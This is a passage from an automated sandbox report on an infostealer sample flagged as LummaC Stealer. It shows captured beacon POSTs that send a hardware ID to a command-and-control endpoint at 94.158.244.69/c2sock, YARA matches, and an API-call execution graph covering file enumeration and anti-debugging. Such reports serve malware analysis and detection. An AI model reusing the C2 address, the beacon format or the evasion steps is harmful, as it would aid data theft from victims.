                                                          Data Ascii: d|7fcV7,w{+iN>2l/{Y!)Y.;^z??wx0<}gyn~x}86J's\z.r_%^ss?`.p%9QlDZE,p Ro
                                                          Nov 13, 2024 10:55:25.369750977 CET2472OUTData Raw: 10 ba 43 de e3 eb ad e1 39 c4 b6 7e 0e 5f a3 be 5f 9e 83 6b 26 8c f5 bd 66 dd 71 33 63 f7 30 bf df 0e 3f a8 d7 fc c1 96 26 ed e7 5f bb de c1 13 d4 5e 41 8d e0 7d 47 7b e6 74 f6 b8 d2 fc ef 0a ef e7 73 fa 0f 7c 27 e1 67 1e b7 2e b6 67 c6 3e e3 8a
                                                          Data Ascii: C9~__k&fq3c0?&_^A}G{ts|'g.g>yH$g;>ogxc2NZWZyo>3%65rGl76:m3j3}xx5|e!!<oA}gc?kH:^W>
                                                          Nov 13, 2024 10:55:25.369767904 CET2472OUTData Raw: c9 5a 3b d4 ff dd b2 b7 5f ff 87 cf bc bd 98 89 bc 17 fa 94 a7 8c d5 f5 8f b6 bf 87 3f 5d dd fe f7 30 7c d6 5f fa eb ff e1 fb 35 da ff 6b fb f3 ec 6f fe d7 32 03 74 fe d7 35 fd bf 9d 70 c0 6e f4 bf 66 1c 30 cd ff cc 5a c0 a2 6b 01 da d2 88 ff e5
                                                          Data Ascii: Z;_?]0|_5ko2t5pnf0ZkrhoYBfkQ??v<0OsA'8~L`~f/^9@m'\]ZOcxY's
                                                          Nov 13, 2024 10:55:25.369906902 CET2472OUTData Raw: 4b 35 12 d3 07 4d 03 e4 1a 81 72 bd 40 db cc e0 3b 76 aa e8 64 cd fd bd 7d 87 aa 8e ad 06 10 e7 49 f3 8b cc fd b5 cc 03 91 49 9a 07 62 d6 09 da 66 7a 70 1e 88 9c 0b 6c b3 40 9e 1b b9 3e f0 bf c9 5b 55 d5 a4 2d 2b e1 3c 60 39 17 58 ae 07 68 ce 0d
                                                          Data Ascii: K5Mr@;vd}IIbfzpl@>[U-+<`9Xhu<_:=Ok:~qM?]aopNPHnpss{X-^'p~ToXxrd/k`<^`i5#)4#8&g
                                                          Nov 13, 2024 10:55:25.369924068 CET2472OUTData Raw: 6e 5e ff b3 f5 03 33 49 fb 3b e6 83 57 94 97 56 fb 5f 1e 13 cc 9f 6a ae 94 5e 13 d8 84 ff 59 4d f0 af e5 a4 51 ff 2b dd fb 4a a8 ff 6b de fc e2 fe 97 64 80 73 ce f2 93 69 80 67 d5 74 f2 f8 5f 3b 0c f0 a5 d3 fc a4 b9 5f 27 fa 7f f3 d6 ff 95 e6 82
                                                          Data Ascii: n^3I;WV_j^YMQ+Jkdsigt_;_'$1}~8_!4k4<Iex`{%L/-s_kMa<=0{.0`x %y_N!yOFs@l1k:A!r?{>9<`}~\


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.104998294.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:34.154098034 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:34.154546976 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.104998394.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:42.941271067 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:42.941651106 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.104998494.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:52.091308117 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:52.091700077 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.104998594.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:56:00.877804995 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:56:00.878206968 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.104998694.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:56:09.633724928 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:56:09.634155989 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.104998794.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:56:18.432607889 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:56:18.433078051 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:04:53:32
                                                          Start date:13/11/2024
                                                          Path:C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\I5jG2Os8GA.exe"
                                                          Imagebase:0x400000
                                                          File size:427'008 bytes
                                                          MD5 hash:E90E793F59C0A6A60182C3F3A597FF0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3054761261.0000000002778000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:04:56:26
                                                          Start date:13/11/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 1720
                                                          Imagebase:0xea0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:4.2%
                                                            Dynamic/Decrypted Code Coverage:11%
                                                            Signature Coverage:51.1%
                                                            Total number of Nodes:792
                                                            Total number of Limit Nodes:25
                                                            execution_graph 70266 4102d1 70269 447a80 70266->70269 70272 44e224 70269->70272 70273 4102da 70272->70273 70274 44e22f RtlFreeHeap 70272->70274 70274->70273 70275 44e244 GetLastError 70274->70275 70276 44e251 __dosmaperr 70275->70276 70278 4447a4 14 API calls __dosmaperr 70276->70278 70278->70273 70279 4069a1 70300 4069ba CallUnexpected 70279->70300 70280 4360e1 15 API calls 70280->70300 70284 40738c 70285 408a5a lstrcatW lstrcatW 70301 40e14e 70285->70301 70286 406aed lstrcatW lstrcatW 70286->70300 70287 407722 lstrcatW lstrcatW 70287->70300 70291 408a43 70324 404710 46 API calls 70291->70324 70298 405aaa 178 API calls 70298->70300 70299 40620b 166 API calls 70299->70300 70300->70280 70300->70284 70300->70285 70300->70286 70300->70287 70300->70291 70300->70298 70300->70299 70315 403ead 47 API calls _strlen 70300->70315 70316 404d0b 16 API calls ___from_strstr_to_strchr 70300->70316 70317 404edc 16 API calls 70300->70317 70318 4034bc 46 API calls 70300->70318 70319 403d1e 46 API calls 70300->70319 70320 40476b 99 API calls 70300->70320 70321 404710 46 API calls 70300->70321 70322 4034fd 101 API calls 70300->70322 70323 404f20 16 API calls 70300->70323 70314 40e172 CallUnexpected 70301->70314 70302 408a85 70304 40d994 155 API calls 70304->70314 70305 40f53e lstrcatW lstrcatW lstrcatW 70305->70314 70307 40e14e 155 API calls 70307->70314 70308 447a80 14 API calls ___std_exception_destroy 70308->70314 70309 40b81c 43 API calls 70309->70314 70311 40e7bc lstrcatW 70312 40e14e 155 API calls 70311->70312 70312->70314 70313 40e54f lstrcatW lstrcatW 70313->70314 70314->70302 70314->70304 70314->70305 70314->70307 70314->70308 70314->70309 70314->70311 70314->70313 70325 40b129 70314->70325 70337 438e28 70314->70337 70345 419e6b 70314->70345 70315->70300 70316->70300 70317->70300 70318->70300 70319->70300 70320->70300 70321->70300 70322->70300 70323->70300 70324->70285 70335 40b13c CallUnexpected 70325->70335 70326 40a928 41 API calls 70326->70335 70327 40b494 70328 438e28 LoadLibraryW GetPEB lstrcmpiW 70328->70335 70329 40b129 41 API calls 70329->70335 70330 40b759 NtReadFile 70332 438e28 3 API calls 70330->70332 70331 40b81c 41 API calls 70331->70335 70334 40b7ab NtClose 70332->70334 70334->70314 70335->70326 70335->70327 70335->70328 70335->70329 70335->70330 70335->70331 70336 447e24 15 API calls ___std_exception_copy 70335->70336 70353 40b7bb 70335->70353 70336->70335 70343 438e45 70337->70343 70338 43935b LoadLibraryW 70338->70343 70339 439535 GetPEB lstrcmpiW 70339->70343 70340 43b362 GetPEB lstrcmpiW 70340->70343 70341 438e28 GetPEB lstrcmpiW 70341->70343 70342 439136 70342->70314 70343->70338 70343->70339 70343->70340 70343->70341 70343->70342 70344 43a4fe GetPEB lstrcmpiW 70343->70344 70344->70343 70351 419e88 70345->70351 70346 41a1d4 70346->70314 70351->70346 70409 418b8f 70351->70409 70412 41831a 119 API calls _wctomb_s 70351->70412 70413 419496 106 API calls 3 library calls 70351->70413 70414 4137c1 16 API calls 2 library calls 70351->70414 70415 41900a 46 API calls 2 library calls 70351->70415 70359 40a928 70353->70359 70355 40b812 70355->70335 70357 438e28 3 API calls 70358 40b807 NtClose 70357->70358 70358->70355 70360 40a941 CallUnexpected 70359->70360 70361 438e28 3 API calls 70360->70361 70372 40a956 CallUnexpected 70361->70372 70362 40b02e lstrcatW lstrlenW 70362->70372 70363 40af6b NtCreateFile 70368 438e28 3 API calls 70363->70368 70364 40ac51 lstrlenW 70364->70372 70365 40acba lstrcatW 70365->70372 70366 438e28 3 API calls 70366->70372 70368->70372 70369 40a928 38 API calls 70369->70372 70370 40b129 38 API calls 70370->70372 70371 40ae4c 70371->70355 70371->70357 70372->70362 70372->70363 70372->70364 70372->70365 70372->70366 70372->70369 70372->70370 70372->70371 70373 40b7bb 38 API calls 70372->70373 70374 40b81c 70372->70374 70373->70372 70399 40b835 __fread_nolock CallUnexpected 70374->70399 70375 40d7fe lstrlenW 70375->70399 70376 40d817 lstrlenW 70376->70399 70377 40d3c0 lstrcmpW 70377->70399 70378 40d891 lstrcmpW 70378->70399 70379 40d352 70379->70372 70380 40d120 NtQueryDirectoryFile 70380->70399 70381 40d6a1 lstrcmpW 70381->70399 70382 40c3a9 lstrcmpW 70382->70399 70383 40c57e lstrlenW 70383->70399 70384 438e28 3 API calls 70392 40d547 NtClose 70384->70392 70385 438e28 LoadLibraryW GetPEB lstrcmpiW 70385->70399 70386 40cc06 lstrcatW lstrcatW 70386->70399 70387 40c8cc lstrcmpW 70387->70399 70388 40c8fe lstrlenW 70388->70399 70389 40cdde lstrcatW 70389->70399 70390 438e28 3 API calls 70394 40cced NtCreateFile 70390->70394 70391 40b81c 26 API calls 70391->70399 70392->70399 70394->70399 70395 40c415 lstrcatW lstrcatW 70395->70399 70396 40b7bb 26 API calls 70396->70399 70397 40a928 26 API calls 70397->70399 70398 40b129 26 API calls 70398->70399 70399->70375 70399->70376 70399->70377 70399->70378 70399->70379 70399->70380 70399->70381 70399->70382 70399->70383 70399->70384 70399->70385 70399->70386 70399->70387 70399->70388 70399->70389 70399->70390 70399->70391 70399->70395 70399->70396 70399->70397 70399->70398 70400 447e24 70399->70400 70402 44eb6f __dosmaperr 70400->70402 70401 44ebad 70408 4447a4 14 API calls __dosmaperr 70401->70408 70402->70401 70404 44eb98 RtlAllocateHeap 70402->70404 70407 44e560 EnterCriticalSection LeaveCriticalSection __dosmaperr 70402->70407 70404->70402 70405 44ebab 70404->70405 70405->70399 70407->70402 70408->70405 70416 418ba2 70409->70416 70411 418b9e 70411->70351 70412->70351 70413->70351 70414->70351 70415->70351 70417 418bb9 _strlen 70416->70417 70424 418c73 70416->70424 70418 447a80 ___std_exception_destroy 14 API calls 70417->70418 70419 418bfe 70417->70419 70417->70424 70418->70419 70420 418c33 70419->70420 70423 418cf3 70419->70423 70419->70424 70428 418c68 70420->70428 70434 415039 46 API calls 70420->70434 70422 447a80 ___std_exception_destroy 14 API calls 70422->70424 70423->70428 70429 44614f GetSystemTimeAsFileTime 70423->70429 70424->70411 70426 418e08 70431 417099 70426->70431 70428->70422 70428->70424 70430 446188 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 70429->70430 70430->70426 70435 44575f 70431->70435 70433 4170be 70433->70428 70434->70428 70436 44576a 70435->70436 70437 44578d 70436->70437 70438 44577a 70436->70438 70439 44579f 70437->70439 70450 4457b2 70437->70450 70481 4447a4 14 API calls __dosmaperr 70438->70481 70483 4447a4 14 API calls __dosmaperr 70439->70483 70442 44577f 70482 44e2f7 29 API calls __wsopen_s 70442->70482 70444 4457a4 70484 44e2f7 29 API calls __wsopen_s 70444->70484 70445 4457d2 70485 4447a4 14 API calls __dosmaperr 70445->70485 70446 4457e3 70473 453aae 70446->70473 70447 445789 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 70447->70433 70450->70445 70450->70446 70454 4457fa 70455 4459ee 70454->70455 70493 45373d 70454->70493 70512 44e307 11 API calls CallUnexpected 70455->70512 70458 4459f8 70459 44580c 70459->70455 70500 453769 70459->70500 70461 44581e 70461->70455 70462 445827 70461->70462 70463 4458ac 70462->70463 70464 445848 70462->70464 70510 4537d0 29 API calls 3 library calls 70463->70510 70507 4537d0 29 API calls 3 library calls 70464->70507 70467 4458b3 70467->70447 70511 453a5a 29 API calls 2 library calls 70467->70511 70468 445860 70468->70447 70508 453a5a 29 API calls 2 library calls 70468->70508 70471 445879 70471->70447 70509 4537d0 29 API calls 3 library calls 70471->70509 70474 453aba ___scrt_is_nonwritable_in_current_image 70473->70474 70475 4457e8 70474->70475 70513 44d13d EnterCriticalSection 70474->70513 70486 453711 70475->70486 70477 453acb 70478 453adf 70477->70478 70514 453ff7 70477->70514 70526 453b02 LeaveCriticalSection CallUnexpected 70478->70526 70481->70442 70482->70447 70483->70444 70484->70447 70485->70447 70487 453732 70486->70487 70488 45371d 70486->70488 70487->70454 70589 4447a4 14 API calls __dosmaperr 70488->70589 70490 453722 70590 44e2f7 29 API calls __wsopen_s 70490->70590 70492 45372d 70492->70454 70494 45375e 70493->70494 70495 453749 70493->70495 70494->70459 70591 4447a4 14 API calls __dosmaperr 70495->70591 70497 45374e 70592 44e2f7 29 API calls __wsopen_s 70497->70592 70499 453759 70499->70459 70501 453775 70500->70501 70502 45378a 70500->70502 70593 4447a4 14 API calls __dosmaperr 70501->70593 70502->70461 70504 45377a 70594 44e2f7 29 API calls __wsopen_s 70504->70594 70506 453785 70506->70461 70507->70468 70508->70471 70509->70447 70510->70467 70511->70447 70512->70458 70513->70477 70527 453b0b 70514->70527 70517 454053 70545 453bc4 70517->70545 70518 45404a 70539 453d65 70518->70539 70521 454050 70522 44e224 ___free_lconv_mon 14 API calls 70521->70522 70523 45405e 70522->70523 70568 43d298 5 API calls ___raise_securityfailure 70523->70568 70525 45406b 70525->70478 70526->70475 70569 45af54 70527->70569 70530 453b31 70530->70517 70530->70518 70533 45af54 42 API calls 70535 453b6a 70533->70535 70534 44e224 ___free_lconv_mon 14 API calls 70534->70530 70536 453b74 70535->70536 70537 453b52 70535->70537 70538 44e224 ___free_lconv_mon 14 API calls 70536->70538 70537->70534 70538->70530 70540 453d75 70539->70540 70541 453769 29 API calls 70540->70541 70542 453d96 70541->70542 70584 44e307 11 API calls CallUnexpected 70542->70584 70544 453ff6 70546 453bd4 70545->70546 70547 453769 29 API calls 70546->70547 70548 453bf1 70547->70548 70549 453d13 70548->70549 70550 453711 29 API calls 70548->70550 70588 44e307 11 API calls CallUnexpected 70549->70588 70553 453c03 70550->70553 70552 453d1d 70553->70549 70554 45373d 29 API calls 70553->70554 70555 453c15 70554->70555 70555->70549 70556 453c1e 70555->70556 70557 44e224 ___free_lconv_mon 14 API calls 70556->70557 70558 453c29 GetTimeZoneInformation 70557->70558 70559 453c45 70558->70559 70560 453cf0 70558->70560 70561 453c79 _wctomb_s 70559->70561 70560->70521 70585 4512d8 41 API calls 2 library calls 70561->70585 70563 453cc8 70586 453b82 43 API calls 4 library calls 70563->70586 70565 453cd9 70587 453b82 43 API calls 4 library calls 70565->70587 70567 453ced 70567->70560 70568->70525 70570 45af5f ___scrt_is_nonwritable_in_current_image 70569->70570 70571 44d13d CallUnexpected EnterCriticalSection 70570->70571 70572 45af76 70571->70572 70573 45b042 42 API calls 70572->70573 70574 45af8c 70573->70574 70575 45afb5 LeaveCriticalSection 70574->70575 70576 453b2a 70575->70576 70576->70530 70577 44eb6f 70576->70577 70578 44ebad 70577->70578 70582 44eb7d __dosmaperr 70577->70582 70579 4447a4 __dosmaperr 14 API calls 70578->70579 70581 44ebab 70579->70581 70580 44eb98 RtlAllocateHeap 70580->70581 70580->70582 70581->70533 70581->70537 70582->70578 70582->70580 70583 44e560 __dosmaperr EnterCriticalSection LeaveCriticalSection 70582->70583 70583->70582 70584->70544 70585->70563 70586->70565 70587->70567 70588->70552 70589->70490 70590->70492 70591->70497 70592->70499 70593->70504 70594->70506 70595 43c910 70596 43c91c ___scrt_is_nonwritable_in_current_image 70595->70596 70621 43cbbb 70596->70621 70598 43c923 70599 43ca76 70598->70599 70608 43c94d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 70598->70608 70644 43ce95 4 API calls 2 library calls 70599->70644 70601 43ca7d 70637 443854 70601->70637 70605 43ca8b 70606 43c96c 70607 43c9ed 70629 43ce0e GetStartupInfoW _wctomb_s 70607->70629 70608->70606 70608->70607 70640 44389e 41 API calls 3 library calls 70608->70640 70610 43c9f3 70630 42f1a8 70610->70630 70615 43ca0f 70615->70601 70616 43ca13 70615->70616 70617 43ca1c 70616->70617 70642 443880 23 API calls CallUnexpected 70616->70642 70643 43cbf4 77 API calls ___scrt_uninitialize_crt 70617->70643 70620 43ca24 70620->70606 70622 43cbc4 70621->70622 70646 43d0b8 IsProcessorFeaturePresent 70622->70646 70624 43cbd0 70647 43d5c2 10 API calls 2 library calls 70624->70647 70626 43cbd5 70628 43cbd9 70626->70628 70648 43d5e1 7 API calls 2 library calls 70626->70648 70628->70598 70629->70610 70631 42f1ad 70630->70631 70649 422177 70631->70649 70657 4245ec 70631->70657 70666 4244e4 GetPEB 70631->70666 70670 42d658 70631->70670 70632 42f1bd 70641 43ce3f GetModuleHandleW 70632->70641 71058 443a0a 70637->71058 70640->70607 70641->70615 70642->70617 70643->70620 70644->70601 70645 44386a 23 API calls CallUnexpected 70645->70605 70646->70624 70647->70626 70648->70628 70654 422191 70649->70654 70650 42245b GetPEB 70650->70654 70651 422398 NtQueryInformationProcess 70651->70654 70654->70650 70654->70651 70655 422491 70654->70655 70695 41f916 GetPEB VirtualQuery 70654->70695 70696 4279e0 70654->70696 70700 41ebeb 58 API calls 70654->70700 70655->70632 70664 424605 70657->70664 70658 4247ff NtQuerySystemInformation 70658->70664 70659 4247b0 GetPEB 70659->70664 70660 4224a3 GetPEB NtQueryInformationProcess GetPEB 70660->70664 70661 4279e0 GetPEB 70661->70664 70662 424980 70662->70632 70664->70658 70664->70659 70664->70660 70664->70661 70664->70662 70665 422177 56 API calls 70664->70665 70702 4262a1 70664->70702 70665->70664 70667 424502 70666->70667 70668 4279e0 GetPEB 70667->70668 70669 4245d2 NtSetInformationThread 70667->70669 70668->70667 70669->70632 70693 42d66d 70670->70693 70671 41a28f 182 API calls 70671->70693 70672 42f265 GetPEB 70672->70693 70673 422177 58 API calls 70673->70693 70674 42f19d 70674->70632 70676 419b9d 72 API calls 70676->70693 70678 4244e4 3 API calls 70678->70693 70680 4269e4 GetPEB GetPEB 70680->70693 70682 42f1c2 GetPEB NtClose GetPEB 70682->70693 70683 4262a1 58 API calls 70683->70693 70684 42d658 281 API calls 70684->70693 70685 40e14e 161 API calls 70685->70693 70687 4245ec 58 API calls 70687->70693 70692 4360e1 15 API calls 70692->70693 70693->70671 70693->70672 70693->70673 70693->70674 70693->70676 70693->70678 70693->70680 70693->70682 70693->70683 70693->70684 70693->70685 70693->70687 70693->70692 70787 402fcc LoadLibraryA LoadLibraryA 70693->70787 70797 401ff9 70693->70797 70808 402476 70693->70808 70821 430228 70693->70821 70834 436adc 70693->70834 70851 434080 70693->70851 70867 433c10 70693->70867 70877 421eeb 70693->70877 70883 4224a3 70693->70883 70889 42cfba 70693->70889 70695->70654 70699 4279fe 70696->70699 70698 428317 70698->70654 70699->70698 70701 428334 GetPEB 70699->70701 70700->70654 70701->70699 70716 4262bc __fread_nolock 70702->70716 70703 426972 70714 422177 55 API calls 70703->70714 70703->70716 70759 424c44 GetModuleFileNameW CreateFileW CloseHandle 70703->70759 70704 426847 RtlAdjustPrivilege 70709 4279e0 GetPEB 70704->70709 70706 4279e0 GetPEB 70706->70716 70707 426600 GetPEB 70707->70716 70708 422817 17 API calls 70708->70716 70709->70716 70711 4269dc 70711->70664 70713 4263c1 LoadLibraryA 70713->70716 70714->70703 70716->70703 70716->70704 70716->70706 70716->70707 70716->70708 70716->70711 70716->70713 70717 4244e4 3 API calls 70716->70717 70719 41f9a4 70716->70719 70756 41eb3f RaiseException 70716->70756 70757 424995 20 API calls 2 library calls 70716->70757 70758 426a42 GetPEB GetPEB 70716->70758 70717->70716 70753 41f9bc 70719->70753 70720 421bb3 NtQuerySystemInformation 70720->70753 70721 421bff NtQuerySystemInformation 70721->70753 70722 42162a GetProcessId 70722->70753 70724 41f916 GetPEB VirtualQuery 70724->70753 70725 424b24 GetPEB HeapDestroy 70725->70753 70726 4245ec 51 API calls 70726->70753 70727 4224a3 GetPEB NtQueryInformationProcess GetPEB 70727->70753 70729 420e2d NtClose 70729->70753 70730 420a7a GetPEB 70730->70753 70731 421ee3 70731->70716 70733 4202ad GetCurrentProcessId 70733->70753 70734 447a80 ___std_exception_destroy 14 API calls 70734->70753 70735 424995 20 API calls 70735->70753 70736 420593 NtDuplicateObject 70736->70753 70737 4228cf 51 API calls 70737->70753 70738 426a42 GetPEB GetPEB 70738->70753 70740 447e24 ___std_exception_copy 15 API calls 70740->70753 70741 41f9a4 51 API calls 70741->70753 70742 422817 17 API calls 70742->70753 70744 422177 51 API calls 70744->70753 70746 4262a1 51 API calls 70746->70753 70747 421eeb NtQueryInformationProcess GetPEB GetPEB 70747->70753 70748 4279e0 GetPEB 70748->70753 70749 420bb6 70749->70753 70775 424c44 GetModuleFileNameW CreateFileW CloseHandle 70749->70775 70776 424bed GetPEB GetModuleFileNameW CreateFileW CloseHandle 70749->70776 70777 4228cf 70749->70777 70751 4269e4 GetPEB GetPEB 70751->70753 70752 41f536 51 API calls 70752->70753 70753->70720 70753->70721 70753->70722 70753->70724 70753->70725 70753->70726 70753->70727 70753->70729 70753->70730 70753->70731 70753->70733 70753->70734 70753->70735 70753->70736 70753->70737 70753->70738 70753->70740 70753->70741 70753->70742 70753->70744 70753->70746 70753->70747 70753->70748 70753->70749 70753->70751 70753->70752 70754 4244e4 3 API calls 70753->70754 70760 44814e 70753->70760 70773 424c8d 58 API calls ___std_exception_copy 70753->70773 70774 41eb3f RaiseException 70753->70774 70782 41ebeb 58 API calls 70753->70782 70783 41e6f0 58 API calls 70753->70783 70754->70753 70756->70716 70757->70716 70759->70703 70761 45699f 70760->70761 70762 4569b7 70761->70762 70763 4569ac 70761->70763 70765 4569bf 70762->70765 70766 4569c8 __dosmaperr 70762->70766 70764 44eb6f __fread_nolock 15 API calls 70763->70764 70770 4569b4 70764->70770 70767 44e224 ___free_lconv_mon 14 API calls 70765->70767 70768 4569f2 RtlReAllocateHeap 